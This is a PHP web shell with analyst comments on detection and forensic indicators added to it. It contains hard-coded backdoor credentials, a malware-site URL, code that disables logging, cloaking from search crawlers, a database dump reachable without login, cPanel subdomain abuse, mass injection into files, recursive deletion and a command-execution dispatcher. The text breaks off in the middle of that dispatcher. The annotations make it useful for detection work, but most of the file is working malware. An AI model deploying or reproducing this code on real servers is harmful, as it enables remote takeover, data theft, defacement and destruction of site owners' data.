1<?php
// Set Username & Password
// Analyst note: hard-coded backdoor credentials. The gate visible further down in this file
// (cookie 'hacked' == md5($pass)) only involves $pass; where $user is checked is not in this part of the file.
$user = "ADMIN";
$pass = "FUCKER";

$malsite = "http://jolygoestobeinvester.ru/"; // Malware Site
// Network IoC: outbound requests to the host above from the web-server process are worth alerting on
// (where this value is used is not in this part of the file).
$ind = "WW91IGp1c3QgZ290IGhhY2tlZCAhISEhIQ=="; // "Deface Page" Base64 encoded "You Just Got Hacked !!"
$bgimage = 'http://i.imgur.com/4NPdqCk.png'; // Background Image
$my_shell_style = "dhanush"; // default UI theme; the 'style' cookie can override it (theme selection later in this file)

$curfile = __FILE__; // the shell's own path; injectdir() uses it to skip itself when mass-writing files
$plsym = "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"; // value redacted in this copy of the sample

// Anti-forensics: error logging is switched off and every runtime limit lifted before anything else runs.
// A PHP file that sets error_log to NULL and log_errors to 0 in its first lines is itself a detection signal.
// set_magic_quotes_runtime() was removed in PHP 7.0 (an undefined-function Error is not silenced by @),
// so this sample appears to target PHP 5.x; the mysql_* calls below point the same way.
@set_magic_quotes_runtime(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
22
// Cloaking: search-engine crawlers get a fake 404 so the shell's page is never indexed.
// Detection: request the file once with a browser User-Agent and once with a crawler UA
// from this list; a 404 only for the crawler is a strong indicator of this kind of cloaking.
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    // case-insensitive substring match against the crawler list
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit; }
}
// Dump Database
// Analyst note: this action runs BEFORE the 'hacked' cookie gate further down, so it is reachable
// without the shell password; it only needs dbserver/dbuser/dbpass cookies plus ?action=dumpDB&dbname=...
if($_GET["action"] == "dumpDB")
{
    $self=$_SERVER["PHP_SELF"];
    if(isset($_COOKIE['dbserver']))
    {
        $date = date("Y-m-d");
        // Database credentials travel in cookies: these cookie names are a log/WAF signature for this family.
        $dbserver = $_COOKIE["dbserver"];
        $dbuser = $_COOKIE["dbuser"];
        $dbpass = $_COOKIE["dbpass"];
        $dbname = $_GET['dbname']; // unvalidated; interpolated into the SQL below and into the output filename
        $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

        $file = "Dump-$dbname-$date"; // immediately overwritten by the next assignment

        // Forensic artifact: the dump is written to the current working directory (normally the
        // directory the shell lives in) and is never removed afterwards.
        $file="Dump-$dbname-$date.sql";
        $fp = fopen($file,"w");

        // Appends $data to the dump file opened above (declared conditionally, inside this branch).
        function write($data)
        {
            global $fp;

            fwrite($fp,$data);

        }
        mysql_connect ($dbserver, $dbuser, $dbpass); // second, redundant connection with the same credentials
        mysql_select_db($dbname);
        $tables = mysql_query ("SHOW TABLES");
        while ($i = mysql_fetch_array($tables))
        {
            $i = $i['Tables_in_'.$dbname];
            // per table: CREATE statement, then one INSERT per row, ';'-separated without newlines
            $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
            write($create['Create Table'].";");
            $sql = mysql_query ("SELECT * FROM ".$i);
            if (mysql_num_rows($sql)) {
                while ($row = mysql_fetch_row($sql)) {
                    foreach ($row as $j => $k) {
                        $row[$j] = "'".mysql_escape_string($k)."'";
                    }
                    write("INSERT INTO $i VALUES(".implode(",", $row).");");
                }
            }
        }

        fclose ($fp);

        // Streams the file back as a download. Detection: a response carrying
        // "Content-Disposition: attachment; filename=Dump-*.sql" from a PHP file that is not a known admin tool.
        header("Content-Disposition: attachment; filename=" . $file);
        header("Content-Type: application/download");
        header("Content-Length: " . filesize($file));
        flush();

        $fp = fopen($file, "r");
        while (!feof($fp))
        {
            echo fread($fp, 65536);
            flush();
        }
        fclose($fp);
    }
}
90$hs_dhanush = "<style type=\"text/css\">
91<!--
92
93body,td,th {
94 color: #FF0000;
95 font-size: 14px;
96}
97tr:hover.lines
98{
99background-color:#000000;}
100tr.lines
101{
102background-color:#0C0C0C;}
103div.fixedbox
104{
105 width:70%;
106 padding:8px;
107 background-color:#171717;
108 position:fixed;
109 left:15%;
110 top:120px;
111 box-shadow: 0px 0px 10px #000;
112 -moz-border-radius: 5px 5px 5px 5px;
113 -webkit-border-radius: 5px 5px 5px 5px;
114 border-radius: 5px 5px 5px 5px;
115}
116div.logindiv{
117background-color:#171717; }
118table.btmtbl{
119border-collapse:collapse;
120border-color:red;}
121td.btmtbl{
122border-color:red;}
123input.but {
124 background-color:#000000;
125 color:#FF0000;
126 border : 1px solid #1B1B1B;
127}
128a:link {
129 color: #00FF00;
130 text-decoration:none;
131 font-weight:500;
132}
133a:hover {
134 color:#00FF00;
135 text-decoration:underline;
136}
137font.txt
138{
139 color: #00FF00;
140 text-decoration:none;
141 font-size:14px;
142}
143font.om
144{
145 color: #00FF00;
146}
147/* Write Permission Font */
148font.wrtperm
149{
150 color:#00FF00;
151}
152/* Read Permission Font */
153font.readperm
154{
155 color:#FF0000;
156}
157/* No Permission Font */
158font.noperm
159{
160 color:#FFFFFF;
161}
162font.mainmenu
163{
164 color:#FF0000;
165 text-decoration:none;
166 font-size:14px;
167}
168a:visited {
169 color: #FF0000;
170}
171input.box
172{
173 background-color:#0C0C0C;
174 color: lime;
175 border : 1px solid #1B1B1B;
176 -moz-border-radius:6px;
177 width:400;
178 border-radius:6px;
179}
180input.sbox
181{
182 background-color:#0C0C0C;
183 color: lime;
184 border : 1px solid #1B1B1B;
185 -moz-border-radius:6px;
186 width:180;
187 border-radius:6px;
188}
189select.sbox
190{
191 background-color:#0C0C0C;
192 color: lime;
193 border : 1px solid #1B1B1B;
194 -moz-border-radius:6px;
195 width:180;
196 border-radius:6px;
197}
198select.box
199{
200 background-color:#0C0C0C;
201 color: lime;
202 border : 1px solid #1B1B1B;
203 -moz-border-radius:6px;
204 width:400;
205 border-radius:6px;
206}
207
208textarea.box
209{
210 border : 3px solid #111;
211 background-color:#161616;
212 color : lime;
213 margin-top: 10px;
214 -moz-border-radius:7px;
215 border-radius:7px;
216}
217body {
218 background-color:#000000;
219}
220.myphp table
221{
222 width:100%;
223 padding:18px 10px;
224 border : 1px solid #1B1B1B;
225}
226.myphp td
227{
228 background:#111111;
229 color:#00ff00;
230 padding:6px 8px;
231 border-bottom:1px solid #222222;
232 font-size:14px;
233}
234.myphp th, th
235{
236 background:#181818;
237
238}
239-->
240</style>";
241$hs_orange = "<style type=\"text/css\">
242<!--
243body {
244background-image:url($bgimage);
245background-color:#000000;
246background-repeat:no-repeat;
247background-attachment:fixed;
248}
249/* Shell Title Color*/
250span.headtitle
251{
252 color:#F90;
253 text-decoration:none;
254
255}
256/* Login Page div*/
257div.logindiv
258{
259background-color:#000000;
260opacity:0.5;
261width:50%;
262border-radius:7px;
263margin-top:150px;
264-moz-border-radius:25px;
265height:410px;
266border: solid 1px
267#878787;
268border-radius: 13px;
269box-shadow: 0px 0px 10px
270black;
271}
272div.fixedbox
273{
274 width:70%;
275 padding:8px;
276 background-color:#171717;
277 position:fixed;
278 left:15%;
279 top:120px;
280 box-shadow: 0px 0px 35px #000;
281 -moz-border-radius: 5px 5px 5px 5px;
282 -webkit-border-radius: 5px 5px 5px 5px;
283 border-radius: 5px 5px 5px 5px;
284}
285table.tbl
286{
287border:#F90;
288}
289body,td,th {
290 color: #F90;
291 font-size: 14px;
292}
293table.btmtbl{
294border-collapse:collapse;
295border-color:#F90;}
296td.btmtbl{
297border-color:#F90;}
298/* Present Working Directory Table */
299table.pwdtbl
300{
301 border-color:#F90;
302}
303/* File List Hover */
304tr.lines:hover
305{
306background-color:#666666;
307opacity:0.5;
308}
309/* File List */
310tr.lines
311{
312 height:12px;
313}
314/* Functions Config */
315td.myfun
316{
317 display: inline;
318 padding: 1px;
319 margin: 5px;
320 border: 1px solid #AAA;
321 border-radius: 4px;
322 -moz-border-radius:4px;
323 box-shadow: 0px 0px 2px #000;
324}
325/* Functions Config Hover */
326td.myfun:hover
327{
328 box-shadow: 0px 0px 2px #FF0;
329}
330/* Button Config */
331input.but {
332 border: 1px solid #F90;
333 background-color:#000000;
334 color:#FFFFFF;
335
336 box-shadow: 0px 0px 2px #F90 inset;
337}
338/* Link Config */
339a:link {
340 color: #F90;
341 text-decoration:none;
342 font-weight:500;
343}
344/* Link Config Hover */
345a:hover {
346 color:#666666;
347 text-decoration:underline;
348}
349/* Link Config Visited */
350a:visited {
351 color: #F90;
352 text-decoration:none;
353}
354/* font Config */
355font.txt
356{
357 color: #FFFFFF;
358 text-decoration:none;
359 font-size:13px;
360}
361font.om
362{
363 color: #F90;
364}
365/* Function Font Config */
366font.fun
367{
368 color:#F90;
369}
370/* Write Permission Font */
371font.wrtperm
372{
373 color:#F90;
374}
375/* Read Permission Font */
376font.readperm
377{
378 color:#FF0000;
379}
380/* No Permission Font */
381font.noperm
382{
383 color:#FFFFFF;
384}
385/* Upload File Config */
386input.upld
387{
388 width:400;
389 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
390}
391/* Input TextBox Config */
392input.box
393{
394 width:400;
395 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
396}
397/* Input Small TextBox Config */
398input.sbox
399{
400 width:180;
401 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
402}
403/* Input Small SelectBox Config */
404select.sbox
405{
406 width:180;
407 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
408}
409/* Input SelectBox Config */
410select.box
411{
412 width:400;
413 margin:0;color:#FFFFFF;background-color:#000;border:1px solid #F90; font: 9pt Monospace,\"Courier New\";
414}
415/* TextArea Config */
416textarea.box
417{
418 border: 1px solid #F90;
419 color:#FFFFFF;
420 margin-top: 10px;
421 box-shadow: 0px 0px 3px #F90 inset;
422 background-color: #000000;
423 opacity: 0.50;
424}
425.myphp table
426{
427 width:100%;
428 padding:18px 10px;
429 border: 1px solid #F90;
430}
431.myphp td
432{
433 padding:6px 8px;
434 border-bottom:1px solid #222222;
435 font-size:14x;
436}
437
438-->
439</style>";
440$hs_404 = "<style type=\"text/css\">
441<!--
442span.headtitle
443{
444 color:#00ff00;
445 text-decoration:none;
446
447}
448body, th{
449 color:#00ff00;
450 background-color:#000000;
451 font-size: 13px;
452}
453div.logindiv{
454background-color:#171717; }
455div.fixedbox
456{
457 width:70%;
458 padding:8px;
459 background-color:#171717;
460 position:fixed;
461 left:15%;
462 top:120px;
463 box-shadow: 0px 0px 35px #000;
464 -moz-border-radius: 5px 5px 5px 5px;
465 -webkit-border-radius: 5px 5px 5px 5px;
466 border-radius: 5px 5px 5px 5px;
467}
468table.tbl
469{
470border:#00ff00;
471}
472table.btmtbl{
473border-collapse:collapse;
474border-color:lime;}
475td.btmtbl{
476border-color:lime;}
477tr.lines:hover
478{
479 background-color:#5e5e5e;
480}
481tr.lines
482{
483 background-color:#000000;
484 height:12px;
485 font-size: 14px;
486}
487td.myfun
488{
489 border-style:none;
490 margin: 5px;
491}
492td.myfun:hover
493{
494 box-shadow: 0px 0px 2px #FF0;
495}
496input.but {
497 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
498}
499a:link {
500 color: #00ff00;
501 text-decoration:none;
502 font-weight:500;
503}
504a:visited
505{
506color:#00ff00;
507}
508a:hover {
509 background:#ff0000;
510}
511font.mainmenu
512{
513 font-size:14px;
514}
515font.txt
516{
517 color: #FFFFFF;
518 text-decoration:none;
519 font-size:13px;
520}
521font.om
522{
523 color:#00FF00;
524}
525font.fun
526{
527
528 color:#00ff00;
529}
530font.wrtperm
531{
532 color:#00ff00;
533}
534font.readperm
535{
536 color:#FF0000;
537}
538font.noperm
539{
540 color:#FFFFFF;
541}
542input.upld
543{
544 width:400;
545 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
546}
547input.box
548{
549 width:400;
550 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
551}
552input.sbox
553{
554 width:180;
555 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
556}
557select.sbox
558{
559 width:180;
560 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
561}
562select.box
563{
564 width:400;
565 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
566}
567
568textarea.box
569{
570 margin:0;color:#00ff00;background-color:#000;border:1px solid #00ff00; font: 9pt Monospace,\"Courier New\";
571}
572.myphp table
573{
574 width:100%;
575 padding:18px 10px;
576 border : 1px solid #00FF00;
577}
578.myphp td
579{
580 background:#111111;
581 color:#00ff00;
582 padding:6px 8px;
583 border-bottom:1px solid #222222;
584 font-size:13px;
585}
586.myphp th,
587{
588 background:#181818;
589
590}
591-->
592</style>";
593$hs_phizo = "<style type=\"text/css\">
594<!--
595span.headtitle
596{
597 color:#000000;
598 text-decoration:none;
599
600}
601div.logindiv
602{
603background-color:#CCC;
604width:50%;
605border-radius:7px;
606margin-top:150px;
607-moz-border-radius:25px;
608height:410px;
609border: solid 1px
610#878787;
611border-radius: 13px;
612box-shadow: 0px 0px 10px
613black;
614}
615div.fixedbox
616{
617 width:70%;
618 padding:8px;
619 background-color:#999999;
620 position:fixed;
621 left:15%;
622 top:120px;
623 box-shadow: 0px 0px 10px #000;
624 -moz-border-radius: 5px 5px 5px 5px;
625 -webkit-border-radius: 5px 5px 5px 5px;
626 border-radius: 5px 5px 5px 5px;
627}
628body,td,th {
629 color: #000000;
630 font-size: 14px;
631}
632table.pwdtbl
633{
634 width:95%;
635 background-color:#999999;
636 -moz-border-radius:25px;
637 border-radius:25px;
638}
639table#maintable
640{
641 background-color: #999999;
642 border: solid 1px #878787;
643 border-radius: 13px;
644 box-shadow: 0px 0px 10px #000;
645 width: 100%;
646 margin: auto;
647 height: auto;
648}
649tr.lines:hover
650{
651background-color:#C0C0C0;
652}
653tr.lines
654{
655 background-color:#999999;
656 height:12px;
657}
658td.myfun
659{
660 display: inline;
661 padding: 1px;
662 margin: 5px;
663 border: 1px solid #AAA;
664 border-radius: 4px;
665 -moz-border-radius:4px;
666 box-shadow: 0px 0px 2px #000;
667}
668td.myfun:hover
669{
670 box-shadow: 0px 0px 2px #FF0;
671}
672input.but {
673 border: 1px solid #787878;
674 border-radius: 5px;
675 box-shadow: 0px 0px 2px #000 inset;
676}
677a:link,a:visited {
678 color: #000000;
679 text-decoration:none;
680 font-weight:500;
681}
682a:hover {
683 color:#666666;
684 text-decoration:underline;
685}
686font.mainmenu
687{
688 display: inline;
689 padding: 1px;
690 border: 1px solid #AAA;
691 border-radius: 4px;
692 box-shadow: 0px 0px 2px #000;
693 text-decoration: none;
694 font-weight: bold;
695 color: #696969;
696}
697font.txt
698{
699 color: #000000;
700 text-decoration:none;
701 font-size:13px;
702}
703font.om
704{
705 color:#000000;
706}
707font.fun
708{
709 color: #696969;
710}
711font.wrtperm
712{
713 color:#000000;
714}
715font.readperm
716{
717 color:#000000;
718}
719font.noperm
720{
721 color:#000000;
722}
723input.upld
724{
725 border: 1px solid #787878;
726 box-shadow: 0px 0px 3px #000 inset;
727 background-color: #AAA;
728 font-family: Courier;
729 -moz-border-radius:6px;
730 width:400;
731 border-radius:6px;
732}
733input.box
734{
735 border: 1px solid #787878;
736 box-shadow: 0px 0px 3px #000 inset;
737 background-color: #AAA;
738 font-family: Courier;
739 -moz-border-radius:6px;
740 width:400;
741 border-radius:6px;
742}
743input.sbox
744{
745 border: 1px solid #787878;
746 box-shadow: 0px 0px 3px #000 inset;
747 background-color: #AAA;
748 font-family: Courier;
749 -moz-border-radius:6px;
750 width:180;
751 border-radius:6px;
752}
753select.sbox
754{
755 border: 1px solid #787878;
756 box-shadow: 0px 0px 3px #000 inset;
757 background-color: #AAA;
758 font-family: Courier;
759 -moz-border-radius:6px;
760 width:180;
761 border-radius:6px;
762}
763select.box
764{
765 border: 1px solid #787878;
766 box-shadow: 0px 0px 3px #000 inset;
767 background-color: #AAA;
768 font-family: Courier;
769 -moz-border-radius:6px;
770 width:400;
771 border-radius:6px;
772}
773
774textarea.box
775{
776 border: 1px solid #787878;
777 margin-top: 10px;
778 -moz-border-radius:7px;
779 box-shadow: 0px 0px 3px #000 inset;
780 background-color: #AAA;
781}
782textarea:focus
783{
784 box-shadow: 0px 0px 3px #FF0 inset;
785}
786body {
787 background-color:#C0C0C0;
788}
789.myphp table
790{
791 width:100%;
792 padding:18px 10px;
793 border : 1px solid #1B1B1B;
794}
795.myphp td
796{
797 /*background:#111111; */
798 color:#000000;
799 padding:6px 8px;
800 border-bottom:1px solid #222222;
801 font-size:14px;
802}
803.myphp th, th
804{
805 background:#999999;
806
807}
808-->
809</style>";
810
// Theme selection: the 'style' cookie wins over the hard-coded default in $my_shell_style.
// Analyst note: the cookie values 'dhanush', '404', 'orange' and 'phizo' are family-specific
// strings that can be used as a request-log signature.
if($_COOKIE['style']=='dhanush')
    $shellstyle = $hs_dhanush;
elseif($_COOKIE['style']=='404')
    $shellstyle = $hs_404;
elseif($_COOKIE['style']=='orange')
    $shellstyle = $hs_orange;
elseif($_COOKIE['style']=='phizo')
    $shellstyle = $hs_phizo;
else
{
    // built-in default; $shellstyle stays unset if $my_shell_style matches none of the four themes
    if($my_shell_style == "phizo")
        $shellstyle = $hs_phizo;
    elseif($my_shell_style=='dhanush')
        $shellstyle = $hs_dhanush;
    elseif($my_shell_style=='404')
        $shellstyle = $hs_404;
    elseif($my_shell_style=='orange')
        $shellstyle = $hs_orange;
}
830if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass))
831{
    // Post-authentication setup. Everything from here on sits inside the gate on the preceding line,
    // if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass)): the "session" is a static value
    // (md5 of the hard-coded password) carried in a cookie literally named 'hacked'. That cookie name
    // is the single most useful log/WAF indicator for this sample.
    $self=$_SERVER["PHP_SELF"];
    $os = "N/D";
    $bdmessage = null;
    $dir = getcwd();

    // Absolute URL of this script and of its directory (consumers are not in this part of the file)
    $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
    $path=explode('/',$url);
    $curr_url =str_replace($path[count($path)-1],'',$url);

    // Coarse OS detection from the first three letters of PHP_OS
    if(strtolower(substr(PHP_OS,0,3)) == "win")
    {
        $SEPARATOR = '\\';
        $os = "Windows";
        $directorysperator="\\";
    }
    else
    {
        $os = "Linux";
        $directorysperator='/';
    }
    // Returns $d with its last two path components (split on $directsperator) removed.
    // implode() is called with (array, glue) argument order, which only legacy PHP accepts.
    function Trail($d,$directsperator)
    {
        $d=explode($directsperator,$d);
        array_pop($d);
        array_pop($d);
        $str=implode($d,$directsperator);
        return $str;
    }
860
    // Builds an 8-character pseudo-random token from a fixed alphabet with rand().
    // Used later in this file (changeindexjo) as the name of a curl cookie-jar file created in the
    // working directory — a small, oddly named 8-character file next to the shell is a forensic artifact.
    function randomt()
    {
        $chars = "abcdefghijkmnopqrstuvwxyz023456789"; // 34 characters; 'l' and '1' are omitted
        srand((double)microtime()*1000000);
        $i = 0;
        $pass = '' ;

        while ($i <= 7)
        {
            $num = rand() % 33; // 0..32, so the final alphabet character is never picked
            $tmp = substr($chars, $num, 1);
            $pass = $pass . $tmp;
            $i++;
        }
        return $pass;
    }
    // cPanel abuse: creates a subdomain through the local cPanel frontend (port 2082) with the
    // supplied account credentials, then drops $subindex as that subdomain's index.html.
    // Detection: web-server-originated connections to localhost:2082 carrying a Basic Authorization
    // header, and cPanel access-log entries for /frontend/x3/subdomain/doadddomain.html.
    function make_subdomain($subDomain,$cPanelUser,$cPanelPass,$subindex)
    {
        $rootDomain = $_SERVER['SERVER_NAME'];
        $buildRequest = "/frontend/x3/subdomain/doadddomain.html?rootdomain=" . $rootDomain . "&domain=" . $subDomain . "&dir=public_html/" . $subDomain;

        $openSocket = fsockopen('localhost',2082);
        if(!$openSocket) {
            return "Socket error<BR>";
        }

        // Credentials are sent as an HTTP Basic header (base64, recoverable from any capture)
        $authString = $cPanelUser . ":" . $cPanelPass;
        $authPass = base64_encode($authString);
        $buildHeaders = "GET " . $buildRequest ."\r\n";
        $buildHeaders .= "HTTP/1.0\r\n";
        $buildHeaders .= "Host:localhost\r\n";
        $buildHeaders .= "Authorization: Basic " . $authPass . "\r\n";
        $buildHeaders .= "\r\n";

        fputs($openSocket, $buildHeaders);
        while(!feof($openSocket)) {
            fgets($openSocket,128); // the response is read and discarded
        }
        fclose($openSocket);
        // create index file
        // Note: the process stays chdir'ed into $subDomain (relative to the current directory) after return.
        @chdir($subDomain);
        $file5 = fopen("index.html","w");
        fputs($file5,$subindex);
        fclose($file5);
        $newDomain = "http://" . $subDomain . "." . $rootDomain . "/<BR>";

        return $newDomain;
    }
909
910 // Database functions
    // Renders the database list for the credentials held in the dbserver/dbuser/dbpass cookies,
    // with per-database Tables / Drop / Dump links (Dump points at the pre-auth ?action=dumpDB path).
    function listdatabase()
    {
        $self=$_SERVER["PHP_SELF"];
        ?>
        <br>
        <form>
        <table>
        <tr>
        <td><input type="text" class="box" name="dbname"></td>
        <td><input type="button" onClick="viewtables('createDB',dbname.value)" value=" Create Database " class="but"></td>
        </tr>
        </table>
        </form>
        <br>
        <?php
        $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
        $result = mysql_query("SHOW DATABASE"); // result unused; the list comes from mysql_list_dbs() below
        echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

        $pDB = mysql_list_dbs( $mysqlHandle );
        $num = mysql_num_rows( $pDB );
        for( $i = 0; $i < $num; $i++ )
        {
            $dbname = mysql_dbname( $pDB, $i );
            mysql_select_db($dbname,$mysqlHandle);
            $result = mysql_query("SHOW TABLES");
            $num_of_tables = mysql_num_rows($result);
            // $dbname is echoed unescaped into HTML and inline JavaScript
            echo "<tr>\n";
            echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\"><font size=3>$dbname</font></a> ($num_of_tables)</td>\n";
            echo "<td><a href=# onClick=\"viewtables('listTables','$dbname')\">Tables</a></td>\n";
            echo "<td><a href=# onClick=\"viewtables('dropDB','$dbname')\">Drop</a></td>\n";
            echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>\n";
            echo "</tr>\n";
        }
        echo "</table>\n";
        mysql_close($mysqlHandle);
    }
948
    // Renders the table list for $_GET['dbname'] using cookie-held credentials, with
    // Schema / Data / Empty / Drop links and a free-form "Execute Query" box (arbitrary SQL —
    // the MySQL general log or a DB audit plugin is where that activity becomes visible).
    // $dbname and $_GET['tablename'] are echoed into HTML and inline JavaScript without escaping.
    function listtable()
    {
        $self=$_SERVER["PHP_SELF"];
        $dbserver = $_COOKIE["dbserver"];
        $dbuser = $_COOKIE["dbuser"];
        $dbpass = $_COOKIE["dbpass"];
        $dbname = $_GET['dbname'];
        echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
        ?>
        <br><br>
        <form>
        <table>

        <tr>
        <td><input type="text" class="box" name="tablename"></td>
        <td><input type="button" onClick="viewtables('createtable','<?php echo $_GET['dbname'];?>')" value=" Create Table " name="createmydb" class="but"></td>
        </tr>
        </table>

        <br>
        <form>
        <table>
        <tr>
        <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
        </tr>
        <tr>
        <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
        </tr>
        </table>
        </form>

        <?php

        $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);

        mysql_select_db($dbname);
        $pTable = mysql_list_tables( $dbname );

        if( $pTable == 0 ) {
            $msg = mysql_error();
            echo "<h3>Error : $msg</h3><p>\n";
            return;
        }
        $num = mysql_num_rows( $pTable );

        echo "<table class=btmtbl cellspacing=1 cellpadding=5 border=1 style=width:60%;>\n";

        for( $i = 0; $i < $num; $i++ )
        {
            $tablename = mysql_tablename( $pTable, $i );
            $result = mysql_query("select * from $tablename"); // full read of every table just to count its rows
            $num_rows = mysql_num_rows($result);
            echo "<tr>\n";
            echo "<td>\n";
            echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\"><font size=3>$tablename</font></a> ($num_rows)\n";
            echo "</td>\n";
            echo "<td>\n";
            echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\">Schema</a>\n";
            echo "</td>\n";
            echo "<td>\n";
            echo "<a href=# onClick=\"viewtables('viewdata','$dbname','$tablename')\">Data</a>\n";
            echo "</td>\n";
            echo "<td>\n";
            echo "<a href=# onClick=\"viewtables('empty','$dbname','$tablename')\">Empty</a>\n";
            echo "</td>\n";
            echo "<td>\n";
            echo "<a href=# onClick=\"viewtables('dropTable','$dbname','$tablename')\">Drop</a>\n";
            echo "</td>\n";
            echo "</tr>\n";
        }

        echo "</table></form>";
        mysql_close($mysqlHandle);
        echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
    }
1024
1025
    // Prints a labelled value: inline when single-line, inside a <pre> block when it contains newlines.
    // Nothing is printed for an empty (or falsy) value, and $v is emitted without HTML escaping.
    function paramexe($n, $v)
    {
        $v = trim($v);
        if($v)
        {
            echo '<span><font size=3>' . $n . ': </font></span>';
            if(strpos($v, "\n") === false)
                echo '<font size=2>' . $v . '</font><br>';
            else
                echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
        }
    }
    $mycount = 0; // running count of files injectdir() has written to
    // Mass file injection: walks $dir recursively and writes $lolinject into every file whose
    // extension equals $filetype, opening each with fopen mode $mode; the shell's own file ($curfile)
    // and any path containing 'dhanush' or 'sym' are skipped.
    // Detection / response: a burst of same-extension files with near-identical mtimes sharing a common
    // appended or replaced blob; file-integrity monitoring on the webroot and a webroot that is not
    // writable by the web-server user limit the blast radius.
    function injectdir($dir,$filetype,$mode,$lolinject)
    {
        global $curfile,$mycount;
        if (is_dir($dir))
        {
            $objects = scandir($dir);
            foreach ($objects as $object)
            {
                // strpos(...) == false is a loose comparison: a match at offset 0 is also treated as "absent"
                if ($object != '.' && $object != '..' && strpos($dir, 'dhanush') == false && strpos($dir, 'sym') == false)
                {
                    if (is_dir($dir . '/' . $object))
                    {
                        // if we find a directory, do a recursive call
                        injectdir($dir . '/' . $object,$filetype,$mode,$lolinject);
                    }
                    else
                    {
                        $file_parts = pathinfo($object);
                        if($file_parts['extension'] == $filetype)
                        {
                            if(($dir . '/' . $object) == $curfile)
                                continue; // never touches the shell itself
                            $fp=fopen($dir . '/' . $object,$mode);
                            if (fputs($fp,$lolinject))
                            {
                                $mycount++;
                                echo '<br><font class=txt >'.$dir . '/' . $object.' was injected<br></font>';
                            }
                            else
                                echo '<font >failed to inject '.$dir . '/' . $object.'<BR></font>';
                        }
                    }
                }
            }
        }
    }
    // Recursively deletes $dir and everything beneath it. The function applies no path restriction
    // and asks for no confirmation; with the web-server user's permissions this is the sample's wipe capability.
    function rrmdir($dir)
    {
        if (is_dir($dir)) // ensures that we actually have a directory
        {
            $objects = scandir($dir); // gets all files and folders inside
            foreach ($objects as $object)
            {
                if ($object != '.' && $object != '..')
                {
                    if (is_dir($dir . '/' . $object))
                    {
                        // if we find a directory, do a recursive call
                        rrmdir($dir . '/' . $object);
                    }
                    else
                    {
                        // if we find a file, simply delete it
                        unlink($dir . '/' . $object);
                    }
                }
            }
            // the original directory is now empty, so delete it
            rmdir($dir);
        }
    }
1100
    // Resolves an executable name by running the host's `which` through execmd(); with execmd()'s
    // default mode that goes through passthru(), so the lookup's output lands directly in the response.
    // Indicator: the web-server user spawning `which <name>` is visible in process auditing (auditd execve).
    function which($pr)
    {
        $path = execmd("which $pr");
        if(!empty($path))
            return trim($path);
        else
            return trim($pr);
    }
1109
    // Undoes magic_quotes_gpc escaping on request input so the raw value can be used verbatim.
    function magicboom($text)
    {
        if (!get_magic_quotes_gpc())
            return $text;
        return stripslashes($text);
    }
    // Command execution through the PECL 'perl' extension: evaluates a Perl system() call and captures
    // its output via output buffering. Only works where that extension is loaded — not having it
    // installed closes this path regardless of disable_functions.
    function perlshell($command)
    {
        $perl=new perl();
        ob_start();
        $perl->eval("system('".$command."')");
        $exec=ob_get_contents();
        ob_end_clean();
        return $exec;
    }
// Command-execution dispatcher. With the default $d_functions ("None") the command is run with
// passthru() directly; otherwise $d_functions is taken as a comma-separated disable_functions list
// and the first execution primitive not named in it is used, checked in this order:
// shell_exec, exec, passthru, system, popen, then proc_open.
// Hardening note: the proc_open branch tests `$safe="proc_open"` (assignment, always true), so it is
// entered for any list entry that survives the earlier checks — in practice the "perl_func" entry —
// meaning proc_open is attempted as soon as the five named functions are all listed as disabled.
// disable_functions must therefore include proc_open as well; the perl_func branch itself is never reached.
// Returns -1 when nothing could be executed.
function execmd($cmd,$d_functions="None")
{
    if($d_functions=="None")
    {
